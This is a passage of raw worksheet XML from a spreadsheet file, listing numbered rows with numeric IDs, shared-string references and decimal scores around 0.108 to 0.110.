      <c r="D18289" s="2">
        <v>1.0</v>
      </c>
      <c r="E18289" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18289" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18290" ht="15.75" customHeight="1">
      <c r="A18290" s="1">
        <v>17710.0</v>
      </c>
      <c r="B18290" s="2">
        <v>5.0595642E7</v>
      </c>
      <c r="C18290" s="2" t="s">
        <v>17631</v>
      </c>
      <c r="D18290" s="2">
        <v>1.0</v>
      </c>
      <c r="E18290" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18290" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18291" ht="15.75" customHeight="1">
      <c r="A18291" s="1">
        <v>19336.0</v>
      </c>
      <c r="B18291" s="2">
        <v>5.5349425E7</v>
      </c>
      <c r="C18291" s="2" t="s">
        <v>17632</v>
      </c>
      <c r="D18291" s="2">
        <v>1.0</v>
      </c>
      <c r="E18291" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18291" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18292" ht="15.75" customHeight="1">
      <c r="A18292" s="1">
        <v>21659.0</v>
      </c>
      <c r="B18292" s="2">
        <v>2.4982865E7</v>
      </c>
      <c r="C18292" s="2" t="s">
        <v>17633</v>
      </c>
      <c r="D18292" s="2">
        <v>1.0</v>
      </c>
      <c r="E18292" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18292" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18293" ht="15.75" customHeight="1">
      <c r="A18293" s="1">
        <v>22092.0</v>
      </c>
      <c r="B18293" s="2">
        <v>3.0766199E7</v>
      </c>
      <c r="C18293" s="2" t="s">
        <v>17634</v>
      </c>
      <c r="D18293" s="2">
        <v>1.0</v>
      </c>
      <c r="E18293" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18293" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18294" ht="15.75" customHeight="1">
      <c r="A18294" s="1">
        <v>25188.0</v>
      </c>
      <c r="B18294" s="2">
        <v>1.3171894E7</v>
      </c>
      <c r="C18294" s="2" t="s">
        <v>17635</v>
      </c>
      <c r="D18294" s="2">
        <v>1.0</v>
      </c>
      <c r="E18294" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18294" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18295" ht="15.75" customHeight="1">
      <c r="A18295" s="1">
        <v>26096.0</v>
      </c>
      <c r="B18295" s="2">
        <v>1.5734511E7</v>
      </c>
      <c r="C18295" s="2" t="s">
        <v>17636</v>
      </c>
      <c r="D18295" s="2">
        <v>1.0</v>
      </c>
      <c r="E18295" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18295" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18296" ht="15.75" customHeight="1">
      <c r="A18296" s="1">
        <v>27018.0</v>
      </c>
      <c r="B18296" s="2">
        <v>2.0033355E7</v>
      </c>
      <c r="C18296" s="2" t="s">
        <v>17637</v>
      </c>
      <c r="D18296" s="2">
        <v>1.0</v>
      </c>
      <c r="E18296" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18296" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18297" ht="15.75" customHeight="1">
      <c r="A18297" s="1">
        <v>29813.0</v>
      </c>
      <c r="B18297" s="2">
        <v>3.5201697E7</v>
      </c>
      <c r="C18297" s="2" t="s">
        <v>17638</v>
      </c>
      <c r="D18297" s="2">
        <v>1.0</v>
      </c>
      <c r="E18297" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18297" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18298" ht="15.75" customHeight="1">
      <c r="A18298" s="1">
        <v>31194.0</v>
      </c>
      <c r="B18298" s="2">
        <v>4921456.0</v>
      </c>
      <c r="C18298" s="2" t="s">
        <v>17639</v>
      </c>
      <c r="D18298" s="2">
        <v>1.0</v>
      </c>
      <c r="E18298" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18298" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18299" ht="15.75" customHeight="1">
      <c r="A18299" s="1">
        <v>32174.0</v>
      </c>
      <c r="B18299" s="2">
        <v>5.4639758E7</v>
      </c>
      <c r="C18299" s="2" t="s">
        <v>17640</v>
      </c>
      <c r="D18299" s="2">
        <v>1.0</v>
      </c>
      <c r="E18299" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18299" s="2">
        <v>0.1101010101010101</v>
      </c>
    </row>
    <row r="18300" ht="15.75" customHeight="1">
      <c r="A18300" s="1">
        <v>19915.0</v>
      </c>
      <c r="B18300" s="2">
        <v>5.7387589E7</v>
      </c>
      <c r="C18300" s="2" t="s">
        <v>17641</v>
      </c>
      <c r="D18300" s="2">
        <v>1.0</v>
      </c>
      <c r="E18300" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18300" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="18301" ht="15.75" customHeight="1">
      <c r="A18301" s="1">
        <v>30031.0</v>
      </c>
      <c r="B18301" s="2">
        <v>3.6178198E7</v>
      </c>
      <c r="C18301" s="2" t="s">
        <v>17642</v>
      </c>
      <c r="D18301" s="2">
        <v>1.0</v>
      </c>
      <c r="E18301" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18301" s="2">
        <v>0.110082304526749</v>
      </c>
    </row>
    <row r="18302" ht="15.75" customHeight="1">
      <c r="A18302" s="1">
        <v>16044.0</v>
      </c>
      <c r="B18302" s="2">
        <v>4.519375E7</v>
      </c>
      <c r="C18302" s="2" t="s">
        <v>17643</v>
      </c>
      <c r="D18302" s="2">
        <v>1.0</v>
      </c>
      <c r="E18302" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18302" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="18303" ht="15.75" customHeight="1">
      <c r="A18303" s="1">
        <v>16314.0</v>
      </c>
      <c r="B18303" s="2">
        <v>4.5969516E7</v>
      </c>
      <c r="C18303" s="2" t="s">
        <v>17644</v>
      </c>
      <c r="D18303" s="2">
        <v>1.0</v>
      </c>
      <c r="E18303" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18303" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="18304" ht="15.75" customHeight="1">
      <c r="A18304" s="1">
        <v>17702.0</v>
      </c>
      <c r="B18304" s="2">
        <v>5.0593374E7</v>
      </c>
      <c r="C18304" s="2" t="s">
        <v>17645</v>
      </c>
      <c r="D18304" s="2">
        <v>1.0</v>
      </c>
      <c r="E18304" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18304" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="18305" ht="15.75" customHeight="1">
      <c r="A18305" s="1">
        <v>25770.0</v>
      </c>
      <c r="B18305" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C18305" s="2" t="s">
        <v>17646</v>
      </c>
      <c r="D18305" s="2">
        <v>1.0</v>
      </c>
      <c r="E18305" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18305" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="18306" ht="15.75" customHeight="1">
      <c r="A18306" s="1">
        <v>33340.0</v>
      </c>
      <c r="B18306" s="2">
        <v>7599881.0</v>
      </c>
      <c r="C18306" s="2" t="s">
        <v>17647</v>
      </c>
      <c r="D18306" s="2">
        <v>1.0</v>
      </c>
      <c r="E18306" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18306" s="2">
        <v>0.1100823045267489</v>
      </c>
    </row>
    <row r="18307" ht="15.75" customHeight="1">
      <c r="A18307" s="1">
        <v>5200.0</v>
      </c>
      <c r="B18307" s="2">
        <v>4.487456E7</v>
      </c>
      <c r="C18307" s="2" t="s">
        <v>17648</v>
      </c>
      <c r="D18307" s="2">
        <v>1.0</v>
      </c>
      <c r="E18307" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18307" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="18308" ht="15.75" customHeight="1">
      <c r="A18308" s="1">
        <v>18532.0</v>
      </c>
      <c r="B18308" s="2">
        <v>5.3086089E7</v>
      </c>
      <c r="C18308" s="2" t="s">
        <v>17649</v>
      </c>
      <c r="D18308" s="2">
        <v>1.0</v>
      </c>
      <c r="E18308" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18308" s="2">
        <v>0.110062893081761</v>
      </c>
    </row>
    <row r="18309" ht="15.75" customHeight="1">
      <c r="A18309" s="1">
        <v>15779.0</v>
      </c>
      <c r="B18309" s="2">
        <v>4.4188808E7</v>
      </c>
      <c r="C18309" s="2" t="s">
        <v>17650</v>
      </c>
      <c r="D18309" s="2">
        <v>1.0</v>
      </c>
      <c r="E18309" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18309" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="18310" ht="15.75" customHeight="1">
      <c r="A18310" s="1">
        <v>21821.0</v>
      </c>
      <c r="B18310" s="2">
        <v>2.6933154E7</v>
      </c>
      <c r="C18310" s="2" t="s">
        <v>17651</v>
      </c>
      <c r="D18310" s="2">
        <v>1.0</v>
      </c>
      <c r="E18310" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18310" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="18311" ht="15.75" customHeight="1">
      <c r="A18311" s="1">
        <v>27605.0</v>
      </c>
      <c r="B18311" s="2">
        <v>2.2627947E7</v>
      </c>
      <c r="C18311" s="2" t="s">
        <v>17652</v>
      </c>
      <c r="D18311" s="2">
        <v>1.0</v>
      </c>
      <c r="E18311" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18311" s="2">
        <v>0.110042735042735</v>
      </c>
    </row>
    <row r="18312" ht="15.75" customHeight="1">
      <c r="A18312" s="1">
        <v>19185.0</v>
      </c>
      <c r="B18312" s="2">
        <v>5.4973931E7</v>
      </c>
      <c r="C18312" s="2" t="s">
        <v>17653</v>
      </c>
      <c r="D18312" s="2">
        <v>1.0</v>
      </c>
      <c r="E18312" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18312" s="2">
        <v>0.1087636932707355</v>
      </c>
    </row>
    <row r="18313" ht="15.75" customHeight="1">
      <c r="A18313" s="1">
        <v>20216.0</v>
      </c>
      <c r="B18313" s="2">
        <v>1.0739807E7</v>
      </c>
      <c r="C18313" s="2" t="s">
        <v>17654</v>
      </c>
      <c r="D18313" s="2">
        <v>1.0</v>
      </c>
      <c r="E18313" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18313" s="2">
        <v>0.1085069444444444</v>
      </c>
    </row>
    <row r="18314" ht="15.75" customHeight="1">
      <c r="A18314" s="1">
        <v>18612.0</v>
      </c>
      <c r="B18314" s="2">
        <v>5.3335359E7</v>
      </c>
      <c r="C18314" s="2" t="s">
        <v>17655</v>
      </c>
      <c r="D18314" s="2">
        <v>1.0</v>
      </c>
      <c r="E18314" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18314" s="2">
        <v>0.1084229390681004</v>
      </c>
    </row>
    <row r="18315" ht="15.75" customHeight="1">
      <c r="A18315" s="1">
        <v>21072.0</v>
      </c>
      <c r="B18315" s="2">
        <v>1.7918982E7</v>
      </c>
      <c r="C18315" s="2" t="s">
        <v>17656</v>
      </c>
      <c r="D18315" s="2">
        <v>1.0</v>
      </c>
      <c r="E18315" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18315" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="18316" ht="15.75" customHeight="1">
      <c r="A18316" s="1">
        <v>31014.0</v>
      </c>
      <c r="B18316" s="2">
        <v>4.7723354E7</v>
      </c>
      <c r="C18316" s="2" t="s">
        <v>17657</v>
      </c>
      <c r="D18316" s="2">
        <v>1.0</v>
      </c>
      <c r="E18316" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18316" s="2">
        <v>0.1083788706739526</v>
      </c>
    </row>
    <row r="18317" ht="15.75" customHeight="1">
      <c r="A18317" s="1">
        <v>20824.0</v>
      </c>
      <c r="B18317" s="2">
        <v>1.5405252E7</v>
      </c>
      <c r="C18317" s="2" t="s">
        <v>17658</v>
      </c>
      <c r="D18317" s="2">
        <v>1.0</v>
      </c>
      <c r="E18317" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18317" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="18318" ht="15.75" customHeight="1">
      <c r="A18318" s="1">
        <v>31474.0</v>
      </c>
      <c r="B18318" s="2">
        <v>5.0486608E7</v>
      </c>
      <c r="C18318" s="2" t="s">
        <v>17659</v>
      </c>
      <c r="D18318" s="2">
        <v>1.0</v>
      </c>
      <c r="E18318" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18318" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="18319" ht="15.75" customHeight="1">
      <c r="A18319" s="1">
        <v>31556.0</v>
      </c>
      <c r="B18319" s="2">
        <v>5119988.0</v>
      </c>
      <c r="C18319" s="2" t="s">
        <v>17660</v>
      </c>
      <c r="D18319" s="2">
        <v>1.0</v>
      </c>
      <c r="E18319" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18319" s="2">
        <v>0.1083333333333333</v>
      </c>
    </row>
    <row r="18320" ht="15.75" customHeight="1">
      <c r="A18320" s="1">
        <v>12099.0</v>
      </c>
      <c r="B18320" s="2">
        <v>2.6751945E7</v>
      </c>
      <c r="C18320" s="2" t="s">
        <v>17661</v>
      </c>
      <c r="D18320" s="2">
        <v>1.0</v>
      </c>
      <c r="E18320" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18320" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="18321" ht="15.75" customHeight="1">
      <c r="A18321" s="1">
        <v>25762.0</v>
      </c>
      <c r="B18321" s="2">
        <v>1.4624992E7</v>
      </c>
      <c r="C18321" s="2" t="s">
        <v>17662</v>
      </c>
      <c r="D18321" s="2">
        <v>1.0</v>
      </c>
      <c r="E18321" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18321" s="2">
        <v>0.108286252354049</v>
      </c>
    </row>
    <row r="18322" ht="15.75" customHeight="1">
      <c r="A18322" s="1">
        <v>19722.0</v>
      </c>
      <c r="B18322" s="2">
        <v>5.6598679E7</v>
      </c>
      <c r="C18322" s="2" t="s">
        <v>17663</v>
      </c>
      <c r="D18322" s="2">
        <v>1.0</v>
      </c>
      <c r="E18322" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18322" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="18323" ht="15.75" customHeight="1">
      <c r="A18323" s="1">
        <v>20236.0</v>
      </c>
      <c r="B18323" s="2">
        <v>1.0851148E7</v>
      </c>
      <c r="C18323" s="2" t="s">
        <v>17664</v>
      </c>
      <c r="D18323" s="2">
        <v>1.0</v>
      </c>
      <c r="E18323" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18323" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="18324" ht="15.75" customHeight="1">
      <c r="A18324" s="1">
        <v>22033.0</v>
      </c>
      <c r="B18324" s="2">
        <v>3.0159552E7</v>
      </c>
      <c r="C18324" s="2" t="s">
        <v>17323</v>
      </c>
      <c r="D18324" s="2">
        <v>1.0</v>
      </c>
      <c r="E18324" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18324" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="18325" ht="15.75" customHeight="1">
      <c r="A18325" s="1">
        <v>29956.0</v>
      </c>
      <c r="B18325" s="2">
        <v>3607687.0</v>
      </c>
      <c r="C18325" s="2" t="s">
        <v>17665</v>
      </c>
      <c r="D18325" s="2">
        <v>1.0</v>
      </c>
      <c r="E18325" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18325" s="2">
        <v>0.1082375478927203</v>
      </c>
    </row>
    <row r="18326" ht="15.75" customHeight="1">
      <c r="A18326" s="1">
        <v>1482.0</v>
      </c>
      <c r="B18326" s="2">
        <v>2.716289E7</v>
      </c>
      <c r="C18326" s="2" t="s">
        <v>17666</v>
      </c>
      <c r="D18326" s="2">
        <v>1.0</v>
      </c>
      <c r="E18326" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18326" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18327" ht="15.75" customHeight="1">
      <c r="A18327" s="1">
        <v>1483.0</v>
      </c>
      <c r="B18327" s="2">
        <v>2.7169937E7</v>
      </c>
      <c r="C18327" s="2" t="s">
        <v>17667</v>
      </c>
      <c r="D18327" s="2">
        <v>1.0</v>
      </c>
      <c r="E18327" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18327" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18328" ht="15.75" customHeight="1">
      <c r="A18328" s="1">
        <v>1560.0</v>
      </c>
      <c r="B18328" s="2">
        <v>2.7652105E7</v>
      </c>
      <c r="C18328" s="2" t="s">
        <v>17668</v>
      </c>
      <c r="D18328" s="2">
        <v>1.0</v>
      </c>
      <c r="E18328" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18328" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18329" ht="15.75" customHeight="1">
      <c r="A18329" s="1">
        <v>1601.0</v>
      </c>
      <c r="B18329" s="2">
        <v>2.7791694E7</v>
      </c>
      <c r="C18329" s="2" t="s">
        <v>17669</v>
      </c>
      <c r="D18329" s="2">
        <v>1.0</v>
      </c>
      <c r="E18329" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18329" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18330" ht="15.75" customHeight="1">
      <c r="A18330" s="1">
        <v>2319.0</v>
      </c>
      <c r="B18330" s="2">
        <v>3.2879895E7</v>
      </c>
      <c r="C18330" s="2" t="s">
        <v>17670</v>
      </c>
      <c r="D18330" s="2">
        <v>1.0</v>
      </c>
      <c r="E18330" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18330" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18331" ht="15.75" customHeight="1">
      <c r="A18331" s="1">
        <v>6737.0</v>
      </c>
      <c r="B18331" s="2">
        <v>4.9348228E7</v>
      </c>
      <c r="C18331" s="2" t="s">
        <v>17671</v>
      </c>
      <c r="D18331" s="2">
        <v>1.0</v>
      </c>
      <c r="E18331" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18331" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18332" ht="15.75" customHeight="1">
      <c r="A18332" s="1">
        <v>7408.0</v>
      </c>
      <c r="B18332" s="2">
        <v>5.1124497E7</v>
      </c>
      <c r="C18332" s="2" t="s">
        <v>17672</v>
      </c>
      <c r="D18332" s="2">
        <v>1.0</v>
      </c>
      <c r="E18332" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18332" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18333" ht="15.75" customHeight="1">
      <c r="A18333" s="1">
        <v>7833.0</v>
      </c>
      <c r="B18333" s="2">
        <v>5.2322113E7</v>
      </c>
      <c r="C18333" s="2" t="s">
        <v>17673</v>
      </c>
      <c r="D18333" s="2">
        <v>1.0</v>
      </c>
      <c r="E18333" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18333" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18334" ht="15.75" customHeight="1">
      <c r="A18334" s="1">
        <v>8137.0</v>
      </c>
      <c r="B18334" s="2">
        <v>5.3138067E7</v>
      </c>
      <c r="C18334" s="2" t="s">
        <v>17674</v>
      </c>
      <c r="D18334" s="2">
        <v>1.0</v>
      </c>
      <c r="E18334" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18334" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18335" ht="15.75" customHeight="1">
      <c r="A18335" s="1">
        <v>10489.0</v>
      </c>
      <c r="B18335" s="2">
        <v>1.1016921E7</v>
      </c>
      <c r="C18335" s="2" t="s">
        <v>17675</v>
      </c>
      <c r="D18335" s="2">
        <v>1.0</v>
      </c>
      <c r="E18335" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18335" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18336" ht="15.75" customHeight="1">
      <c r="A18336" s="1">
        <v>10577.0</v>
      </c>
      <c r="B18336" s="2">
        <v>1.3027901E7</v>
      </c>
      <c r="C18336" s="2" t="s">
        <v>17676</v>
      </c>
      <c r="D18336" s="2">
        <v>1.0</v>
      </c>
      <c r="E18336" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18336" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18337" ht="15.75" customHeight="1">
      <c r="A18337" s="1">
        <v>11147.0</v>
      </c>
      <c r="B18337" s="2">
        <v>1.934958E7</v>
      </c>
      <c r="C18337" s="2" t="s">
        <v>17677</v>
      </c>
      <c r="D18337" s="2">
        <v>1.0</v>
      </c>
      <c r="E18337" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18337" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18338" ht="15.75" customHeight="1">
      <c r="A18338" s="1">
        <v>11376.0</v>
      </c>
      <c r="B18338" s="2">
        <v>2.1416588E7</v>
      </c>
      <c r="C18338" s="2" t="s">
        <v>17678</v>
      </c>
      <c r="D18338" s="2">
        <v>1.0</v>
      </c>
      <c r="E18338" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18338" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18339" ht="15.75" customHeight="1">
      <c r="A18339" s="1">
        <v>12121.0</v>
      </c>
      <c r="B18339" s="2">
        <v>2.6900329E7</v>
      </c>
      <c r="C18339" s="2" t="s">
        <v>17679</v>
      </c>
      <c r="D18339" s="2">
        <v>1.0</v>
      </c>
      <c r="E18339" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18339" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18340" ht="15.75" customHeight="1">
      <c r="A18340" s="1">
        <v>14518.0</v>
      </c>
      <c r="B18340" s="2">
        <v>3.9760199E7</v>
      </c>
      <c r="C18340" s="2" t="s">
        <v>17680</v>
      </c>
      <c r="D18340" s="2">
        <v>1.0</v>
      </c>
      <c r="E18340" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18340" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18341" ht="15.75" customHeight="1">
      <c r="A18341" s="1">
        <v>14585.0</v>
      </c>
      <c r="B18341" s="2">
        <v>4.0134174E7</v>
      </c>
      <c r="C18341" s="2" t="s">
        <v>17681</v>
      </c>
      <c r="D18341" s="2">
        <v>1.0</v>
      </c>
      <c r="E18341" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18341" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18342" ht="15.75" customHeight="1">
      <c r="A18342" s="1">
        <v>14686.0</v>
      </c>
      <c r="B18342" s="2">
        <v>4.0516118E7</v>
      </c>
      <c r="C18342" s="2" t="s">
        <v>17682</v>
      </c>
      <c r="D18342" s="2">
        <v>1.0</v>
      </c>
      <c r="E18342" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18342" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18343" ht="15.75" customHeight="1">
      <c r="A18343" s="1">
        <v>15592.0</v>
      </c>
      <c r="B18343" s="2">
        <v>4.3457798E7</v>
      </c>
      <c r="C18343" s="2" t="s">
        <v>17683</v>
      </c>
      <c r="D18343" s="2">
        <v>1.0</v>
      </c>
      <c r="E18343" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18343" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18344" ht="15.75" customHeight="1">
      <c r="A18344" s="1">
        <v>15855.0</v>
      </c>
      <c r="B18344" s="2">
        <v>4.4470957E7</v>
      </c>
      <c r="C18344" s="2" t="s">
        <v>17684</v>
      </c>
      <c r="D18344" s="2">
        <v>1.0</v>
      </c>
      <c r="E18344" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18344" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18345" ht="15.75" customHeight="1">
      <c r="A18345" s="1">
        <v>16265.0</v>
      </c>
      <c r="B18345" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C18345" s="2" t="s">
        <v>17685</v>
      </c>
      <c r="D18345" s="2">
        <v>1.0</v>
      </c>
      <c r="E18345" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18345" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18346" ht="15.75" customHeight="1">
      <c r="A18346" s="1">
        <v>16374.0</v>
      </c>
      <c r="B18346" s="2">
        <v>4.6164935E7</v>
      </c>
      <c r="C18346" s="2" t="s">
        <v>17686</v>
      </c>
      <c r="D18346" s="2">
        <v>1.0</v>
      </c>
      <c r="E18346" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18346" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18347" ht="15.75" customHeight="1">
      <c r="A18347" s="1">
        <v>16504.0</v>
      </c>
      <c r="B18347" s="2">
        <v>4.6601756E7</v>
      </c>
      <c r="C18347" s="2" t="s">
        <v>17687</v>
      </c>
      <c r="D18347" s="2">
        <v>1.0</v>
      </c>
      <c r="E18347" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18347" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18348" ht="15.75" customHeight="1">
      <c r="A18348" s="1">
        <v>17209.0</v>
      </c>
      <c r="B18348" s="2">
        <v>4.9037054E7</v>
      </c>
      <c r="C18348" s="2" t="s">
        <v>17688</v>
      </c>
      <c r="D18348" s="2">
        <v>1.0</v>
      </c>
      <c r="E18348" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18348" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18349" ht="15.75" customHeight="1">
      <c r="A18349" s="1">
        <v>17279.0</v>
      </c>
      <c r="B18349" s="2">
        <v>4.9209107E7</v>
      </c>
      <c r="C18349" s="2" t="s">
        <v>17689</v>
      </c>
      <c r="D18349" s="2">
        <v>1.0</v>
      </c>
      <c r="E18349" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18349" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18350" ht="15.75" customHeight="1">
      <c r="A18350" s="1">
        <v>17819.0</v>
      </c>
      <c r="B18350" s="2">
        <v>5.0905824E7</v>
      </c>
      <c r="C18350" s="2" t="s">
        <v>17690</v>
      </c>
      <c r="D18350" s="2">
        <v>1.0</v>
      </c>
      <c r="E18350" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18350" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18351" ht="15.75" customHeight="1">
      <c r="A18351" s="1">
        <v>18106.0</v>
      </c>
      <c r="B18351" s="2">
        <v>5.1731327E7</v>
      </c>
      <c r="C18351" s="2" t="s">
        <v>17691</v>
      </c>
      <c r="D18351" s="2">
        <v>1.0</v>
      </c>
      <c r="E18351" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18351" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18352" ht="15.75" customHeight="1">
      <c r="A18352" s="1">
        <v>19868.0</v>
      </c>
      <c r="B18352" s="2">
        <v>5.7204592E7</v>
      </c>
      <c r="C18352" s="2" t="s">
        <v>17692</v>
      </c>
      <c r="D18352" s="2">
        <v>1.0</v>
      </c>
      <c r="E18352" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18352" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18353" ht="15.75" customHeight="1">
      <c r="A18353" s="1">
        <v>19898.0</v>
      </c>
      <c r="B18353" s="2">
        <v>5731534.0</v>
      </c>
      <c r="C18353" s="2" t="s">
        <v>17693</v>
      </c>
      <c r="D18353" s="2">
        <v>1.0</v>
      </c>
      <c r="E18353" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18353" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18354" ht="15.75" customHeight="1">
      <c r="A18354" s="1">
        <v>20383.0</v>
      </c>
      <c r="B18354" s="2">
        <v>1.1962447E7</v>
      </c>
      <c r="C18354" s="2" t="s">
        <v>17694</v>
      </c>
      <c r="D18354" s="2">
        <v>1.0</v>
      </c>
      <c r="E18354" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18354" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18355" ht="15.75" customHeight="1">
      <c r="A18355" s="1">
        <v>20686.0</v>
      </c>
      <c r="B18355" s="2">
        <v>1.4484164E7</v>
      </c>
      <c r="C18355" s="2" t="s">
        <v>17695</v>
      </c>
      <c r="D18355" s="2">
        <v>1.0</v>
      </c>
      <c r="E18355" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F18355" s="2">
        <v>0.108187134502924</v>
      </c>
    </row>
    <row r="18356" ht="15.75" customHeight="1">
      <c r="A18356" s="1">
        <v>20799.0</v>
      </c>
      <c r="B18356" s="2">
        <v>1.5268711E7</v>
      </c>
      <c r="C18356" s="2" t="s">
        <v>17696</v>
      </c>
      <c r="D18356" s="2">
        <v>1.0</v>
      </c>
